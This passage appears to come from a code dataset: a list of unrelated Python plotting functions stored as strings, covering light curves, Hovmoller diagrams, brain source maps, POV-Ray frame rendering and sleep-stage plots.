valid_filts = VALID_PHOT_FILTS.copy()\n new_labels = []; new_handles = []\n while len(valid_filts) > 0:\n if valid_filts[0] in labels:\n new_labels.append(valid_filts[0])\n new_handles.append(temp_dict[valid_filts[0]])\n valid_filts = valid_filts[1:] \n by_label = OrderedDict(zip(new_labels,new_handles))\n ax = plt.gca() # get current axes\n box = ax.get_position()\n ax.set_position([box.x0, box.y0 + box.height * 0.1, \n box.width, box.height * 0.9])\n ax.legend(by_label.values(), by_label.keys(), \n #loc=\"lower center\", \n #bbox_to_anchor=(0.5, -0.15), \n loc=\"center right\",\n bbox_to_anchor=(1.13, 0.5),\n fontsize=18, \n ncol=1, fancybox=True)\n \n ## titles and axis labels \n if title: # set it\n plt.title(title, fontsize=18)\n if tmerger:\n plt.xlabel(r\"$t - t_{\\mathrm{merger}}$\"+\" [days]\", fontsize=18)\n else:\n plt.xlabel(\"MJD\", fontsize=18) \n plt.ylabel(\"Magnitude (AB)\", fontsize=18)\n plt.gca().invert_yaxis() # invert so brighter stars higher up \n plt.grid()\n \n ## ticks\n plt.tick_params(axis='both', which='major', labelsize=20)\n plt.gca().xaxis.set_ticks_position(\"both\") # ticks on both sides\n plt.gca().yaxis.set_ticks_position(\"both\")\n \n ## text box\n if text:\n plt.text(text[0], text[1], text[2], fontsize=18)\n \n if output:\n plt.savefig(output, bbox_inches=\"tight\")\n \n return fig", "def plot_hovmoller(self, zi=10):\n fig, axes = plt.subplots(nrows=3)\n ax_avg, ax_U, ax_Uf = axes\n\n self.mean_velocity_Uf(ax_avg)\n ax_avg.axhline(zi, linewidth=2, color='black')\n\n ax_U.set_title('Hovmoller of streamwise velocity')\n hovmoller_U = self.hovmoller(ax_U, quantity=self.u)\n # over plot line of detected 
front passage\n # FIXME: this x should be from self\n x = np.indices((self.u.shape[1],)).squeeze()\n tf = self.tf\n ax_U.plot(tf(x), x, label='detected front')\n\n ax_U.set_title('Hovmoller of shifted streamwise velocity')\n self.hovmoller(ax_Uf, quantity=self.uf)\n # over plot line of detected front passage\n ax_Uf.axvline(-self.front_offset, label='detected front')\n\n ax_U.legend()\n ax_Uf.legend()\n\n # make space for shared colorbar\n fig.tight_layout(rect=(0, 0, 0.9, 1))\n cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])\n fig.colorbar(hovmoller_U, cax=cax, use_gridspec=True)\n\n return fig", "def quick_plot(solution):\n plt.suptitle('GNLSE solution')\n\n plt.subplot(1, 2, 1)\n plot_wavelength_vs_distance(solution)\n\n plt.subplot(1, 2, 2)\n plot_delay_vs_distance(solution)\n\n plt.show()", "def plot_rand(txyxidata, b,X, outfile):\r\n\t\r\n\tme = \"LE_Plot.plot_rand: \"\r\n\tif os.path.isfile(outfile): return me+\"skip\"\r\n\tt0 = time.time()\r\n\tshowplot = False\r\n\t\r\n\tt, x, eta, xi = txyxidata\r\n\tdel txyxidata\r\n\ttmax = np.ceil(t.max())\r\n\t\r\n\t## Plot walk\r\n\tfs = 25\r\n\twinsize = int(tmax/80)\r\n\tfig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\r\n\tfig.suptitle(outfile)#+\"\\n\"+str(argv)[1:-1])\r\n\tenvelope_plot(t, xi, winsize, ax=ax1)\r\n\tax1.set_ylabel(\"$\\\\xi$\",fontsize=fs)\r\n\tenvelope_plot(t, eta, winsize, ax=ax2)\r\n\tax2.set_ylabel(\"$\\eta$\",fontsize=fs)\r\n\tenvelope_plot(t, x, winsize, ax=ax3)\r\n\tax3.plot([0,t.max()],[X,X],\"k--\"); ax3.plot([0,t.max()],[-X,-X],\"k--\")\r\n\tax3.set_xlabel(\"$t$\",fontsize=fs);ax3.set_ylabel(\"$x$\",fontsize=fs)\r\n\tetalim = np.ceil(abs(eta).max())\t## Not perfect\r\n\t#fig.tight_layout()\r\n\tplt.savefig(outfile)\r\n\tprint me+\"Plot saved as\",outfile\r\n\tprint me+\"Plotting random data:\",round(time.time()-t0,1),\"seconds\"\r\n\tif showplot:\t\tplt.show()\t\r\n\t\r\n\tplt.close(fig)\t\r\n\treturn", "def peek(self, **kwargs):\n\n plt.figure()\n axes = plt.gca()\n data_lab=self.meta['OBS-FREQ'][0:2] + ' ' + self.meta['OBS-FREQ'][2:5]\n axes.plot(self.data.index,self.data,label=data_lab)\n axes.set_yscale(\"log\")\n axes.set_ylim(1e-4,1)\n axes.set_title('Nobeyama Radioheliograph')\n axes.set_xlabel('Start time: ' + self.data.index[0].strftime(TIME_FORMAT))\n axes.set_ylabel('Correlation')\n axes.legend()\n plt.show()", "def LE_SimPlt(b,X,timefac,BW,smooth):\r\n\tme = \"LE_Plot.LE_SimPlt: \"\r\n\t\r\n\tprint \"\\n== \"+me+\"b =\",b,\" X =\",X,\" BW =\",BW,\"==\\n\"\r\n\t\r\n\tt0 = time.time()\r\n\t\r\n\t## Filenames\r\n\ttrafile, rndfile, pdffile, strfile, n = get_filenames(b,X,timefac,BW)\r\n\t\r\n\t## GET_TRADATA\r\n\t## Time-series / trajectory data: load or simulate\r\n\ttry:\t\t\r\n\t\ttxyxidata = np.load(trafile+\".npy\")[:n,:]\r\n\t\tprint me+\"Trajectory file found\",trafile+\".npy\"\r\n\texcept IOError:\r\n\t\tprint me+\"No trajectory file found. Simulating...\"\r\n\t\ttxyxidata = LE_Simulate.LEsim(b,X,timefac,BW)\r\n\t\t\r\n\tprint me,collect()\r\n\t\r\n\t## GET_STRDATA\r\n\t## Interpolated current data: load or calculate\r\n\ttry:\r\n\t\tA = np.load(strfile+\".npy\"); grd = A.shape[1]\r\n\t\tx,y,gvx,gvy = A[0],A[1],A[2:grd+2],A[grd+2:]\r\n\t\toargs = np.loadtxt(strfile+\".hdr\")\r\n\t\tprint me+\"Steamgrid file found\",strfile+\".npy\"\r\n\texcept IOError:\r\n\t\tprint me+\"No streamgrid file found. 
Calculating...\"\r\n\t\tx,y,gvx,gvy,oargs = calc_grid(txyxidata[1:3], b,X, strfile, BW)\r\n\r\n\tprint me,collect()\r\n\t\r\n\t\r\n\t## Plots\r\n\t# plot_rand(txyxidata, b,X, rndfile)\r\n\t# print me,collect()\r\n\tplot_pdf(txyxidata[1:3], b,X, pdffile)\r\n\tprint me,collect()\r\n\tplot_stream( x,y,gvx,gvy,np.append(oargs,smooth), strfile )\r\n\tprint me,collect()\r\n\t\r\n\tprint me+\"Total time\",round(time.time()-t0,1),\"seconds\"\t\r\n\treturn", "def _update_plot(self):\n\n self.T_ex[:-1] = self.T_ex[1:]\n self.T_ex[-1] = self.ensemble.T_ex\n self.plot_T_ex[0].set_ydata(self.T_ex)\n self.T_kin[:-1] = self.T_kin[1:]\n self.T_kin[-1] = self.ensemble.T_kin\n self.plot_T_kin[0].set_ydata(self.T_kin)\n self.canvas.draw()\n\n renderer = self.canvas.get_renderer()\n raw_data = renderer.tostring_rgb()\n surf = pygame.image.fromstring(raw_data,\n (self.plot_width, self.disp_height),\n \"RGB\")\n self.game_display.blit(surf, (self.disp_width, 0))", "def plotsources(self): \n mainDir = Inverse.mainDir\n folder_name = self.folder_name\n os.chdir(mainDir)\n \n folder = os.listdir(u'.')\n subfolders = [f for f in folder if f[0] == 'S']\n\n for subject in subfolders:\n # go to the directory\n curdir = os.path.join(mainDir, subject)\n os.chdir(curdir)\n # locate source files\n stcfiles = glob.glob('*-rh.stc')\n\n for ii, fname in enumerate(stcfiles):\n # read the source files\n print(fname)\n stc = mne.read_source_estimate(os.path.join(curdir, fname))\n plottitle = fname.split('_c')[0]\n\n try:# plot the surface\n # Get labels for FreeSurfer 'aparc' cortical parcellation with 34 labels/hemi\n labels_parc = mne.read_labels_from_annot(subject, parc='aparc', subjects_dir = mainDir)\n\n # plot the sources\n brain = stc.plot(subject=subject, surface='pial', hemi='both', colormap='auto',\n time_label='auto', smoothing_steps=10, transparent=True, alpha=0.8,\n time_viewer=False, subjects_dir=None, figure=None, views='dor',\n colorbar=True, clim='auto', cortex='classic', size=800, background='black',\n foreground='white',\n initial_time = self.initial_time, time_unit='s', backend='auto', spacing='oct5')\n\n vertno_max, time_max = stc.get_peak(hemi='lh')\n brain.add_foci(vertno_max, coords_as_verts=True, hemi='lh', color='red')\n\n vertno_max_rh, time_max_rh = stc.get_peak(hemi='rh')\n brain.add_foci(vertno_max_rh, coords_as_verts=True, hemi='rh', color='blue')\n\n brain.add_text(0.1, 0.9, plottitle, 'title', font_size=36)\n\n except Exception as errMessage:\n print('Something went wrong with subject >>>', fname)\n print(errMessage)\n pass\n \"\"\"\n views : str | list\n View to use. See surfer.Brain(). Supported views: ['lat', 'med', 'fos',\n 'cau', 'dor' 'ven', 'fro', 'par']. 
Using multiple views is not\n supported for mpl backend.\n \"\"\"\n labelo = []\n try:\n #brain.add_annotation\n labelo.append([label for label in labels_parc if label.name == 'postcentral-lh'][0])\n labelo.append([label for label in labels_parc if label.name == 'postcentral-rh'][0])\n labelo.append([label for label in labels_parc if label.name == 'precentral-lh'][0] )\n labelo.append([label for label in labels_parc if label.name == 'precentral-rh'][0] )\n# labelo.append([label for label in labels_parc if label.name == 'inferiorparietal-lh'][0])\n# labelo.append([label for label in labels_parc if label.name == 'inferiorparietal-rh'][0])\n# labelo.append([label for label in labels_parc if label.name == 'superiorfrontal-rh'][0])\n# labelo.append([label for label in labels_parc if label.name == 'superiorfrontal-lh'][0])\n\n for label in labelo:\n brain.add_label(label, borders=1)\n\n except Exception as errMessage:\n print(errMessage)\n pass\n\n try: # make a directory called 'results'\n os.mkdir(os.path.join(curdir, folder_name))\n except Exception as errMessage:\n print(errMessage)\n\n finally:\n os.chdir(os.path.join(curdir, folder_name))\n brain.save_image(fname.split('_c')[0])\n brain.close()\n\n os.chdir(mainDir)", "def __init__(self, object_stream, dpi=100, width=7, height=6.5,\r\n point_size=1, point_color='b', show_labels=True, radius=0,\r\n interval=20, blit=False):\r\n\r\n super().__init__(object_stream=object_stream, dpi=dpi, width=width,\r\n height=height)\r\n \r\n # adjust for axis size\r\n scale = self.ax.get_ylim()[1] - self.ax.get_ylim()[0]\r\n self.point_size = point_size * scale / 100\r\n self.point_color = point_color\r\n\r\n self.timer = self.ax.text(0.02, 0.5, '0', fontsize=15,\r\n transform=plt.gcf().transFigure)\r\n\r\n self.show_labels = show_labels\r\n if (isinstance(radius,int) or isinstance(radius,float)) and radius>0:\r\n self.radius = radius * scale / 100\r\n else:\r\n self.radius = {v_id:r * scale / 100 for v_id, r in radius.items()}\r\n\r\n self.interval = interval\r\n self.blit = blit", "def plot_visualize_mft_sources(fwdmag, stcdata, tmin, tstep,\n subject, subjects_dir):\n print(\"##### Attempting to plot:\")\n # cf. 
decoding/plot_decoding_spatio_temporal_source.py\n vertices = [s['vertno'] for s in fwdmag['src']]\n if len(vertices) == 1:\n vertices = [fwdmag['src'][0]['vertno'][fwdmag['src'][0]['rr'][fwdmag['src'][0]['vertno']][:, 0] <= -0.],\n fwdmag['src'][0]['vertno'][fwdmag['src'][0]['rr'][fwdmag['src'][0]['vertno']][:, 0] > -0.]]\n elif len(vertices) > 2:\n warnings.warn('plot_visualize_mft_sources(): Cannot handle more than two sources spaces')\n return\n\n stc_feat = SourceEstimate(stcdata, vertices=vertices,\n tmin=tmin, tstep=tstep, subject=subject)\n itmaxsum = np.argmax(np.sum(stcdata, axis=0))\n twmin = tmin + tstep * float(itmaxsum - stcdata.shape[1] / 20)\n twmax = tmin + tstep * float(itmaxsum + stcdata.shape[1] / 20)\n for ihemi, hemi in enumerate(['lh', 'rh', 'both']):\n brain = stc_feat.plot(surface='white', hemi=hemi, subjects_dir=subjects_dir,\n transparent=True, clim='auto')\n # use peak getter to move visualization to the time point of the peak\n print(\"Restricting peak search to [%fs, %fs]\" % (twmin, twmax))\n if hemi == 'both':\n brain.show_view('parietal')\n vertno_max, time_idx = stc_feat.get_peak(hemi=None, time_as_index=True,\n tmin=twmin, tmax=twmax)\n else:\n brain.show_view('lateral')\n vertno_max, time_idx = stc_feat.get_peak(hemi=hemi, time_as_index=True,\n tmin=twmin, tmax=twmax)\n print(\"hemi=%s: setting time_idx=%d\" % (hemi, time_idx))\n brain.set_data_time_index(time_idx)\n if hemi == 'lh' or hemi == 'rh':\n # draw marker at maximum peaking vertex\n brain.add_foci(vertno_max, coords_as_verts=True, hemi=hemi, color='blue',\n scale_factor=0.6)\n\n if len(fwdmag['src']) > ihemi:\n fwds = fwdmag['src'][ihemi]\n comax = fwds['rr'][vertno_max]\n print(\"hemi=%s: vertno_max=%d, time_idx=%d fwdmag['src'][%d]['rr'][vertno_max] = \" % \\\n (hemi, vertno_max, time_idx, ihemi), comax)\n\n offsets = np.append([0], [s['nuse'] for s in fwdmag['src']])\n if hemi == 'lh':\n ifoci = [np.nonzero([stcdata[0:offsets[1], time_idx] >= 0.25 * np.max(stcdata[:, time_idx])][0])]\n elif len(fwdmag['src']) > 1:\n ifoci = [np.nonzero([stcdata[offsets[1]:, time_idx] >= 0.25 * np.max(stcdata[:, time_idx])][0])]\n vfoci = fwds['vertno'][ifoci[0][0]]\n cfoci = fwds['rr'][vfoci]\n print(\"Coords of %d sel. 
vfoci: \" % cfoci.shape[0])\n print(cfoci)\n print(\"vfoci: \")\n print(vfoci)\n print(\"brain.geo[%s].coords[vfoci] : \" % hemi)\n print(brain.geo[hemi].coords[vfoci])\n\n mrfoci = np.zeros(cfoci.shape)\n invmri_head_t = invert_transform(fwdmag['info']['mri_head_t'])\n mrfoci = apply_trans(invmri_head_t['trans'], cfoci, move=True)\n print(\"mrfoci: \")\n print(mrfoci)\n\n # Just some blops along the coordinate axis:\n # This will not yield reasonable results w an inflated brain.\n # bloblist = np.zeros((300,3))\n # for i in xrange(100):\n # bloblist[i,0] = float(i)\n # bloblist[i+100,1] = float(i)\n # bloblist[i+200,2] = float(i)\n # mrblobs = apply_trans(invmri_head_t['trans'], bloblist, move=True)\n # brain.add_foci(mrblobs, coords_as_verts=False, hemi=hemi, color='yellow', scale_factor=0.3)\n brain.save_image('testfig_map_%s.png' % hemi)\n brain.close()", "def psfminusmodel_plot(epoch, model, features, filters, figname, fgal=0.5,\n idx=-1):\n # fetch Stripe 82 data\n X, Xcov = fetch_prepped_s82data(epoch, fgal, features, filters)\n Xcoadd, Xcoaddcov = fetch_prepped_s82data(epoch, fgal, features,\n filters, use_single=False)\n\n # unpickle the XD model\n if type(model) == str: \n f = open(model, 'rb')\n model = cPickle.load(f)\n f.close()\n\n fs = 5\n Nbins = [50, 50, 50]\n lsize = 20\n mags = [19.5, 20.5, 21.5]\n dlt = [0.15, 0.15, 0.15]\n f = pl.figure(figsize=(3 * fs, fs))\n pl.subplots_adjust(wspace=0.3)\n for i in range(len(mags)):\n ind = (Xcoadd[:, idx] < 0.03) & (Xcoadd[:, 0] > mags[i] - dlt[i])\n ind = ind & (Xcoadd[:, 0] <= mags[i] + dlt[i])\n\n x = X[ind]\n xc = Xcov[ind]\n\n a, m, v = model.posterior(x, xc)\n posts = np.zeros_like(x)\n for j in range(x.shape[0]):\n posts[j] = np.median(model.sample(a[j], m[j], v[j], size=1000),\n axis=0)\n\n ax = pl.subplot(1, 3, i + 1)\n h, b = np.histogram(x[:, idx], Nbins[i])\n d = (b[1] - b[0]) / 2.\n b = np.append([b[0] - d], b[:-1] + d)\n h = np.append([1.0], h)\n pl.plot(b, h, drawstyle='steps-mid', linestyle='dotted',\n color='k', lw=2)\n h, b = np.histogram(posts[:, idx], Nbins[i])\n d = (b[1] - b[0]) / 2.\n b = np.append([b[0] - d], b[:-1] + d)\n h = np.append([1.0], h)\n pl.plot(b, h, drawstyle='steps-mid', color='k', lw=2)\n pl.xlabel('psfmag - modelmag $r$', fontsize=lsize)\n pl.ylabel('counts', fontsize=lsize)\n ax.text(0.95, 0.95, '$r=%0.1f$' % mags[i], fontsize=lsize, ha='right',\n va='top', transform=ax.transAxes)\n pl.xlim(-0.1, 0.2)\n f.savefig(figname, bbox_inches='tight')", "def flareplot_template(df, jsonpath):\n #'track' entry for json file: each track is a node (position) in the flareplot\n helix_colors = {'1':\"#78C5D5\",'12':\"#5FB0BF\",'2':\"#459BA8\",'23':\"#5FAF88\",'3':\"#79C268\",'34':\"#9FCD58\",'4':\"#C5D747\",'45':\"#DDD742\",'5':\"#F5D63D\",'56':\"#F3B138\",'6':\"#F18C32\",'67':\"#ED7A6A\",'7':\"#E868A1\",'78':\"#D466A4\",'8':\"#BF63A6\",'Ligand--1':'#FF5050', 'Ligand': '#FF5050'} \n allpos = set(df['Position1']).union(set(df['Position2']))\n tracks = [{\n 'trackLabel': 'Degree centrality',\n \"trackProperties\": []\n }]\n trees = [{\n 'treeLabel': 'Helices',\n 'treePaths': []\n }]\n \n #Add ligand\n tracks[0]['trackProperties'].append({\n 'color' : \"#FF5050\",\n 'size' : 1.0,\n 'nodeName': 'Ligand'\n })\n trees[0]['treePaths'].append([1, 'Ligand'])\n \n setpos = set()\n for multipos in allpos:\n if multipos.startswith('Ligand'):\n continue\n \n split_pos = multipos.split('x')\n for pos in split_pos:\n if split_pos.index(pos) == 0:\n helix = pos\n color = helix_colors[helix]\n else: \n real_pos = 
helix+'x'+pos\n if real_pos not in setpos:\n trackprop = {\n 'color' : color,\n 'size' : 1.0,\n 'nodeName': real_pos\n }\n if len(helix) == 2:\n newhelix = int(helix[0]) + int(helix[1])\n trees[0]['treePaths'].append([newhelix, real_pos])\n else:\n newhelix = int(helix)*2\n trees[0]['treePaths'].append([newhelix, real_pos])\n\n tracks[0]['trackProperties'].append(trackprop)\n setpos.add(real_pos)\n\n #Sort trees\n treePaths_sorted = sorted(list(trees[0]['treePaths']), key=lambda l: (l[0],l[1]))\n treePaths_sorted = [ str(x[0])+\".\"+x[1] for x in treePaths_sorted ]\n trees[0]['treePaths'] = treePaths_sorted\n \n #Output jsondict to store\n jsondict = { 'trees' : trees, 'tracks' : tracks }\n \n # Store json file\n jsonpath = basepath + \"template.json\" \n with open(jsonpath, 'w') as jsonfile:\n dump(jsondict, jsonfile, ensure_ascii=False, indent = 4)", "def plot_img():\n plt.subplot(121)\n plt.imshow(data.data.numpy()[0,].squeeze())\n plt.subplot(122)\n plt.imshow(dec_mean.view(-1,28,28).data.numpy()[0,].squeeze())\n\n plt.show()\n plt.pause(1e-6)\n plt.gcf().clear()\n sample = model.sample_z(data) \n plt.imshow(sample)", "def _display_from_tsne(self, x, y):\n\n # Find the closest 9\n inds = np.argsort(np.sum( (self._Y_tsne-np.array([x, y]))**2, axis=1))\n print(inds[:10])\n\n # Plot the green circles on the tsne plot\n self._display_tsne()\n self._tsne_window.plot(self._Y_tsne[inds[:9],0], self._Y_tsne[inds[:9],1], 'yo')\n\n # Now run through the 9 sub axes and display the image data and cutout location.\n self._sub_window_filenames = []\n for ii, axis in enumerate(self._sub_windows):\n axis.clear()\n\n fits_filename, filename, sliceno, middle = self._process_result_filename_cutout_number[inds[ii]]\n print('display from tsne fits: {} filename: {}'.format(fits_filename, filename))\n\n # So, the filename actually contains the wrong path on it so we\n # need to take it off and use the proper path.\n pf = pickle.load(open(os.path.join(self._cutouts_directory, filename), 'rb'))\n ff = list(glob.iglob('{}/**/{}'.format(self._data_directory, pf['filename'].split('/')[-1])))[0]\n\n print(ff)\n self._display_window(axis, ff)\n self._sub_window_filenames.append(fits_filename)\n\n # Draw the line\n axis.plot([middle[0]-112, middle[0]-112], [middle[1]-112, middle[1]+112], 'y')\n axis.plot([middle[0]+112, middle[0]+112], [middle[1]-112, middle[1]+112], 'y')\n axis.plot([middle[0]-112, middle[0]+112], [middle[1]-112, middle[1]-112], 'y')\n axis.plot([middle[0]-112, middle[0]+112], [middle[1]+112, middle[1]+112], 'y')\n\n plt.figure(1).show()\n plt.figure(1).canvas.draw()", "def initial_plots(runs):\n for run in runs.keys():\n meta = runs[run]\n plot_pdfs(meta)\n plot_priorsamps(meta)\n plot_ivals(meta)\n# if meta.truNz is not None:\n# plot_true(meta)\n timesaver(meta,'iplot',meta.key)", "def plot_mt_lb(self, subject_id:str, style:str, bin_state:bool=False, lag:Optional[Real]=None) -> Tuple[pd.DataFrame, pd.DataFrame]:\n import matplotlib.pyplot as plt\n df_lb = self.load_labels(subject_id)\n fig, ax_lb = plt.subplots(figsize=(20,4))\n if bin_state:\n df_lb[\"sleep_stage\"] = df_lb[\"sleep_stage\"].apply(lambda ss: self.to_binary_labels[ss])\n ax_lb.plot(df_lb[\"sec\"].values, df_lb[\"sleep_stage\"].values, color=\"red\")\n ax_lb.set_yticks(np.arange(0,3,1))\n ax_lb.set_yticklabels([\"unscored\",\"sleep\",\"wake\"])\n else:\n df_lb[\"sleep_stage\"] = df_lb[\"sleep_stage\"].apply(lambda ss: self.to_conventional_labels[ss])\n ax_lb.plot(df_lb[\"sec\"].values, df_lb[\"sleep_stage\"].values, 
color=\"red\")\n ax_lb.set_yticks(np.arange(0,7,1))\n ax_lb.set_yticklabels([\"unscored\",\"N4\",\"N3\",\"N2\",\"N1\",\"REM\",\"wake\"])\n \n lb_rg_t = df_lb.iloc[[0,-1]][\"sec\"].values\n df_mt = self.load_motion_data(subject_id)\n if lag is not None:\n lb_rg_t[0] = lb_rg_t[0]-lag\n lb_rg_t[-1] = lb_rg_t[-1]+lag\n df_mt = df_mt[(df_mt[\"sec\"]>=lb_rg_t[0])&(df_mt[\"sec\"]<=lb_rg_t[1])]\n ax_mt = ax_lb.twinx()\n ax_mt.plot(df_mt[\"sec\"].values, df_mt[\"x\"].values, label=\"x\")\n ax_mt.plot(df_mt[\"sec\"].values, df_mt[\"y\"].values, label=\"y\")\n ax_mt.plot(df_mt[\"sec\"].values, df_mt[\"z\"].values, label=\"z\")\n ax_mt.legend(loc=\"best\")\n return df_lb, df_mt", "def setup(self, flags):\n self.figure = pylab.figure(1)\n self.axes = {}\n self.stream_data = {}\n self.flags = flags", "def plot_frames(beads, sim, ti, tf, savebase):\n \n ### define the color for the spheres\n\n print 'defining colors'\n sphere_rgbcolor = gen_colors(sim.nbeads)\n\n ### create povray settings\n\n print 'creating povray settings'\n sphere_radius, img_widthpx, img_heightpx, povray_includes, \\\n povray_defaults, sun1, sun2, background, povray_cam, quality \\\n = gen_img_settings_quality(sim.lx)\n \n zi = np.zeros((sim.nbeads))\n \n ### set general plot properties\n\n os.system(\"mkdir -p \" + savebase)\n savebase += 'eps_' + str(sim.eps) + '_fp_' + str(sim.fp) + \\\n '_areak_' + str(sim.areak) + '_kappa_' + str(sim.kappa) + '/'\n os.system(\"mkdir -p \" + savebase)\n \n ### plot the frames\n \n for step in range(ti, tf):\n \n time = step*sim.dt\n print 'Step / Total : ', step, tf\n \n ### create povray items\n \n print 'generating povray item'\n particles = vapory.Object( \\\n vapory.Union( \\\n *[ vapory.Sphere([beads.xi[step, 0, j], beads.xi[step, 1, j],zi[j]], \\\n sphere_radius, vapory.Texture( \\\n vapory.Pigment('color', sphere_rgbcolor[j]), \\\n vapory.Finish('phong',1)) ) for j in range(0, sim.nbeads ) ] ) )\n\n ### generate povray objects\n\n print 'generating povray objects'\n povray_objects = [sun1, sun2, background, particles]\n ### create the scene\n scene = vapory.Scene( camera = povray_cam,\n objects = povray_objects, \n included = povray_includes, \n defaults = povray_defaults )\n \n ### render image\n \n print 'rendering scene'\n savename = \"pov-frame-\" + \"{0:05d}\".format(int(step)) + \".png\"\n scene.render(outfile=savename, width=img_widthpx, height=img_heightpx, \\\n antialiasing=0.001, quality=quality, remove_temp=True)\n \n ### move the image to the correct destination\n \n os.system('mv ' + savename + ' ' + savebase)\n \n return", "def plot_tags(self,seconds=False):\n plot_add_tags(self.tags,seconds)\n return", "def plot(self):\n\t\tself.plotOfSpect().plot()", "def make_plot(x,y):", "def plot_xyzt(grbdir,ax, x, y, z, t):\n global runconf\n\t\n colors = ['blue', 'gray', 'red', 'black']\n names = ['X', 'Y', 'Z', grbdir]\n zdirs = ['x', 'y', 'z', None]\n\n mkffile = runconf['mkffile']\n trigtime = runconf['trigtime']\n ra_tran = runconf['ra']\n dec_tran = runconf['dec']\n mkfdata = fits.getdata(mkffile, 1)\n window = 10\n sel = abs(mkfdata['time'] - trigtime) < window\t\n \n earthx = -np.median(mkfdata['posx'][sel])\n earthy = -np.median(mkfdata['posy'][sel]) \n earthz = -np.median(mkfdata['posz'][sel]) \n \n earth_vec_mag = np.sqrt(earthx**2 + earthy**2 + earthz**2)\n \n earth = coo.SkyCoord(earthx, earthy, earthz, frame='icrs', representation='cartesian')\n \t\t\t\n ax.set_xlim(-1.2,1.2)\n ax.set_ylim(-1.2,1.2)\n ax.set_zlim(-1.2,1.2)\n\n for count, dirn in enumerate([x, y, z, t]):\n 
xx, yy, zz = dirn.cartesian.x.value, dirn.cartesian.y.value, dirn.cartesian.z.value\n ax.quiver(0, 0, 0, xx, yy, zz, color=colors[count])\n ax.text(xx, yy, zz, names[count], zdirs[count])\n\t\n ax.quiver(0,0,0,earthx/earth_vec_mag,earthy/earth_vec_mag,earthz/earth_vec_mag,color='green') \n ax.text(earthx/earth_vec_mag,earthy/earth_vec_mag,earthz/earth_vec_mag,'Earth')\n \n #ax.set_xlabel(\"RA = 0\")\n #ax.set_zlabel(\"Pole\")\n return", "def plot(self):\n # Get data\n #print(self.file_name)\n fig, ax = plb.subplots(1,1,figsize=(18,20))\n for key,value in self.testTrend.items():\n x = np.arange(len(self.data_array))\n y = np.asarray(value)\n plb.plot(x,y, label=key)\n ax.scatter(x, y)\n for i in range(0, len(value)):\n ax.annotate(str(i), (x[i], y[i]))\n # Title\n plb.title(self.file_name)\n # Legend\n plb.legend(bbox_to_anchor=(.05, 1), loc='best', borderaxespad=0.)\n # x ticks\n plb.xticks(np.arange(min(x), max(x) + 1, 2.0))\n #plb.ylim(-250, 1)\n # Show image\n plb.show()", "def plot_dataset(self):\n plt.plot(self.ground_truth, marker='o')\n plt.ylabel('Number of Topics')\n plt.xlabel('Window Number')\n plt.yticks(list(set(self.ground_truth)))\n plt.savefig(os.path.join(self.output_path, 'shift-plot.pdf'))", "def setup_plot(self):\n x, y = next(self.stream).T\n c = None\n s = 100\n self.scat = self.ax.scatter(x, y, c=c, s=s, \n vmin=0, vmax=1,\n cmap=\"jet\", edgecolor=\"k\")\n self.ax.axis([0, 16.5, 0, 5])\n self.ax.set_ylabel('wouldbe x')\n self.ax.set_xlabel('wouldbe y')\n # return the updated artist to FuncAnimation\n # It expects a sequence of artists, thus the trailing comma.\n return self.scat,", "def trajectory_plotter(trajectories, title = \"Trajectories\"):\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection=\"3d\")\r\n\r\n ax.set_xlabel('X')\r\n ax.set_ylabel('Y')\r\n ax.set_zlabel('Z')\r\n ax.set_title(title)\r\n\r\n for i in range(trajectories.shape[0]):\r\n ax.plot(trajectories[i, 0, :], trajectories[i, 1, :], trajectories[i, 2, :], label=f\"Bird {i}\")\r\n\r\n # ax.legend()\r\n\r\n return plt.show()", "def plot_fig43a_looping_TSS(a=10, loglog=True):\n\n fig, ax = plt.subplots(figsize=(default_width, default_height))\n #convert a to basepairs\n a_in_bp = a / ncg.dna_params['lpb']\n links35 = np.tile(35, 44)\n Rlinks = np.array([47, 21, 18, 15, 20, 17])\n Llinks = np.array([245, 30, 26, 15, 23, 35])\n #links to right of methylation site (50 in total)\n Rlinks = np.concatenate((Rlinks, links35))\n #links to left of methylation site (50 in total)\n Llinks = np.concatenate((Llinks, links35))\n #cumulative chain length including burried basepairs\n unwrap = 0\n #plot as positive distance from TSS in bp\n ldna_Rlinks = convert.genomic_length_from_links_unwraps(Rlinks, unwraps=unwrap) #max WLC chain length in bp\n #plot as negative distance from TSS in bp\n ldna_Llinks = -1*convert.genomic_length_from_links_unwraps(Llinks, unwraps=unwrap) #max WLC chain length in bp\n rvals = np.linspace(0.0, 1.0, 1000)\n integral_R = np.load('../deepti/csvs/Bprops/0unwraps/heterogenous/Sarah/Rlinks_1to50nucs/kinkedWLC_greens_Rlinks_50nucs_1000rvals.npy')\n integral_L = np.load('../deepti/csvs/Bprops/0unwraps/heterogenous/Sarah/Llinks_1to50nucs/kinkedWLC_greens_Llinks_50nucs_1000rvals.npy')\n Prob_a_Rlinks_kinked = wlc.prob_R_in_radius_a_given_L(a_in_bp, integral_R, rvals, Rlinks, unwrap)\n Prob_a_Llinks_kinked = wlc.prob_R_in_radius_a_given_L(a_in_bp, integral_L, rvals, Llinks, unwrap)\n #plot in units of nm^(-3)\n ax.plot(ldna_Rlinks, Prob_a_Rlinks_kinked/(ncg.dna_params['lpb']**3), 
'-o', markersize=3, color=teal_flucts)\n ax.plot(ldna_Llinks, Prob_a_Llinks_kinked/(ncg.dna_params['lpb']**3), '-o', markersize=3, color=teal_flucts)\n plt.xlabel(r'Distance from TSS (bp)')\n plt.ylabel(r'$P_\\mathrm{loop}(a=10\\mathrm{nm}; L)\\;\\;\\;(\\mathrm{nm}^{-3})$')\n plt.subplots_adjust(left=0.16, bottom=0.19, top=0.98, right=0.96)\n plt.yscale('log')\n plt.ylim([10**-3, 10**-0.4])\n plt.xlim([-10000, 10000])\n plt.savefig(f'plots/thesis/fig43a_looping-TSS-yeast.pdf', bbox_inches='tight')", "def animate(i): \n ax1.clear()\n font_dict = {'family':'sans-serif',\n 'color':'darkred',\n 'size':8}\n for i in range(len(xt)):\n ax1.text(xt[i], yt[i], tt[i], fontdict=font_dict)\n ax1.plot(xs, ys)\n #ax1.scatter(xt, yt, 'yo')\n\n # This is for plotting the coordinates and the class of the detected object\n animated_plot = plt.plot(xt, yt, 'yo')[0]\n animated_plot.set_xdata(xt)\n animated_plot.set_ydata(yt)\n plt.draw()", "def plot_trajectories_XYZ(t_start,t_stop):\n \n time, ankle_l_trajectory, ankle_r_trajectory,foot_l_contact,foot_r_contact,muscle_lh_activations, 